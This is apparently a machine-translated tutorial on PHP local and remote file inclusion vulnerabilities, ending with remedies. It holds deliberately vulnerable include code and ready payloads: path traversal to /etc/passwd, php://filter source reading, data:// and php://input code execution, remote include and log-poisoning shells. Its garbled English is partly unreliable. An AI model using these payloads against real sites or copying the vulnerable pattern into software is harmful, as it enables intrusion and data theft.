The file contains a Web security vulnerabilities

What is a file that contains

Developers typically write the function will re-use of a single file, call this file directly you need to use a function. Without writing again, this process is generally referred file called file contains.
For example: include "conn.php"

PHP function include files in common

• include ()
  When this function include files, and only the code execution include () function if the file contains come, it gives a warning when an error occurs, it goes on.
• include_once ()
  function with the Include () the same, except that when repeated calls to the same file, the program called only once
• require ()
  the difference between require () and include () that require () to perform if an error occurs, the function will output an error message and terminates the script.
• require_once ()
  function require () the same, except that when repeated calls to the same file, the program calls only once.

the difference

• inlude: file contains does not exist, the program will continue
• require: contains the file does not exist, the program stops execution
  (if syntax errors, two does not continue, if not find this file, include continued execution, require, stop execution)

File Inclusion Vulnerabilities principle
reason is the file that contains the vulnerability created by the introduction in the file, the referenced file names, user-controllable, due to the incoming file name without reasonable check, or check is bypassed.

Common Vulnerabilities Code

if(isset($_GET[page])){
	 include $_GET[page];
}else{
	 include "home.php";
}

File Inclusion Vulnerabilities harm

• With file upload vulnerability GetShell
• To execute arbitrary script code
• Website source code files and configuration files leaked
• Remote contain GetShell
• Control of the entire site or even server

File contains the classification of vulnerabilities

• Local file when the file is included in the local server, they form contains loopholes.
• Local and Remote File Include file contains causes the vulnerability is the same, when the configuration options and allow_url_include php.ini allow_url_fopen is ON in the case, may file contains a third-party server files, thus forming a Remote File Inclusion vulnerability.

Local file contains exploit

• Upload pictures Ma, Ma GetShell contains pictures
• Read the website source code and configuration files
• It contains log files GetShell

Upload pictures containing _001

<?php
if(isset($_GET[page])){
	  include($_GET[page]);
}else{
	  include 'show.php';
}
?>

Upload pictures containing _002

<?php
if(isset($_GET[page])){
	  include('./action/' . $_GET[page]);
}else{
	  include ./action/show.php';
}
?>

Upload pictures containing _003

<?php
if(isset($_GET[page])){
	 include('./action/'. $_GET[page] . '.php');
}else{
	 include './action/show.php';
}
?>

00% cut

• /etc/passwd%00
• Need magic_quotes_gpc = off, PHP 5.3.4 less than effective

Truncated path length

• /etc/passwd././././././././././././.[…]/././././././././.
• php version 5.2.8 can be less than successful, linux needs the file name longer than 4096, windows need to be longer than 256

Reading a local file server

• ?page=…/…/…/…/…/…/…/etc/passwd

Read the website source files
? Index.php page = php: //filter/read=convert.base64-encode/resource=index.php

Pseudo-protocol:

• Direct file containing the Trojan, can be a picture, txt, archive ...
• ? page = php: // input receiving a post request
  needs to open only needs to open allow_url_include
• ? page = http: //172.18.11.66/0831/1.txt
  need to turn allow_url_fopen, allow_url_include (remote included)
• ? Page = PHP: //filter/read=convert.base64-
  encode / Resource = main.php (read source code files)
• ?page=data://text/plain,<?php phpinfo();?>
  需要开启allow_url_fopen,allow_url_include

It contains log files GetShell

1. First, find the log file location
2. Let the log files into PHP code
3. It contains log files

Remote file include use
include remote txt file (php.ini configuration options and allow_url_include allow_url_fopen is on), store a txt file, or on a remote server
does not parsed php file. (Because the time is returned php comprising source code, it can not be resolved)

index.php?page=http://www.xxx.com/1.txt

Vulnerability Mining

• There is no universal approach to mining
• Specific CMS, there may be a specific version of the loopholes (include, require)
• Web vulnerability scanner scans, common web vulnerability scanner support can be detected.

Remedy

• PHP open_basedir configuration is used to restrict access to the area specified
• Filtration. (Point) / (slash) \ (backslash)
• Prohibit remote file server that contains
  (allow_url_fopen, allow_url_include, off)